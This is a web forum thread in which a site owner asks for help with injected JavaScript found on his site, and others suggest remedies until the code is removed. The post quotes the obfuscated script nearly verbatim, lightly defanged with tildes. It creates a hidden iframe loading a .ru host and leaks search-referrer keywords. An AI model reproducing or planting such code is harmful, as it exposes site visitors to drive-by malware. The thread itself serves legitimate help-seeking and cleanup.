Hello,

I fear one of my websites is infected with some Trojan or other malware.  A few days ago I started to notice that every time I navigated to a new page a strange URL would briefly appear in the status bar).  I looked at the page source and did not see anything.  Then I viewed my pages with Firebug and found the following code in it (address is listed in iFrame):

<~~s~c~r~i~p~t~ src="~http~://~imgur-com~.mediaset.it.rottentomatoes-com.ExcellentBlender.ru:8080/cloob.com/cloob.com/google.com/opera.com/nih.gov.php" defer=" ">
Puu3cic = 'h^$!^)t)t($!p#@:^!/(/)#(i$(#m@g$u)r&&(-$@c)&o(m((^.(#m@!e))d()!i^&^!a&s)^@e)(@t@)^.((i!$#t^.!#r&$o$t$)(t^e&&n^&#t# )^o^#!m!!a&)#t$!#&o^!e)@$$s^)-@$c&@o$@&$#m!!!.$e(x!@c^)e$!(l)&l@)(e^(!n^t@b^^#l@#e(!^n!@#d!e)$r&@.@#&&r&@ #u^'.replace(/\^|\!|\)|\(|@|&|\$|#/ig, '');
3Y5wegt = 'Y5wegtSa7y67xu';
4O9q7hm = document.createElement('iIf(rha(m(eI'.replace(/[Iku\(h]/g, ''));
5Y5wegt = 'Y5wegtSa7y67xu';
6Sa7y67xu = '';
7G5n9dq56 = '';
8Y5wegt = document.referrer;
9function Nmjhcpe2(A4jk0ry,Q71xj0ul){
10if (Y5wegt.indexOf(A4jk0ry) != -1){
11 Sa7y67xu=A4jk0ry;
12 Vwx8wmg = Y5wegt.indexOf(Q71xj0ul+'=');
13 if (Vwx8wmg != -1){
14 G5n9dq56 = Y5wegt.substring(Vwx8wmg+2).split('&')[0];
15 }
16}
17}
18//Nmjhcpe2('google.','q');Nmjhcpe2('search.yahoo.','p');Nmjhcpe2('ask.com','q ');
19
20O9q7hm.style.visibility = 'h(@^$#i(&&d$@$!d$@e@n$!!#'.replace(/&|@|\(|#|\!|\$|\^|\)/ig, '');
21O9q7hm.src = Puu3cic+':28z0Q820z/2iQn2d2eQx2.7p2h7pQ?7j2a2=Q&zjQl7=z'.replace(/[zI72Q]/g, '')+Sa7y67xu+'&kl='+G5n9dq56;
22document.body.appendChild(O9q7hm);
<~/script>
<~~i~f~r~a~m~e~ style="visibility: hidden;" src="~http~://~imgur-com~.mediaset.it.rottentomatoes-com.excellentblender.ru:8080/index.php?ja=&jl=&kl=">
<~html>
<~head><~/head>
<~body><~/body>
<~/html>
<~/iframe>
<~/body>

I added ~ to hopefully disable everything while letting you see the code.  Has anyone seen anything like this before?  Any ideas how to get rid of it?  My ISP is stumped too.  There are no strange files (php or otherwise) on my site.  I tried upgrading from 5.1.4 to 5.2.3 to see if the process of writing over files would fix it, it did not.  Any suggestions would be greatly appreciated!

Chip

If your host can't find anything, try viewing your site from a different computer. It's possible that the infection is on your viewing computer. To me, this looks like some nasty javascript.

I would download and install a product called Malwarebytes from www.malwarebytes.org/

It is an excellent product. It has a free version that you can run, and it has a paid version that will run in the background protecting you.

Give it a shot. It sounds to me like it's a virus on your computer and not your website as Joe said.

Hi Everyone,

Sorry for the much delayed post. I wanted to let you know everything was resolved some time ago. Joseph you were correct - someone inserted some javascript into a few files on my site. My ISP cleaned them out and I have been running fine ever since.

Mark, I took your advice and tried the free version of Malwarebytes. I liked it so much I purchased five licenses for it! I tried running one of the licenses on a SBS server. It caused problems with network drive mapping. Other than the fact that I cannot use it on a server, the software has been great. Thanks again!

Chip

Chip, I'm happy everything was resolved! This community is a good community here at DNNCreative.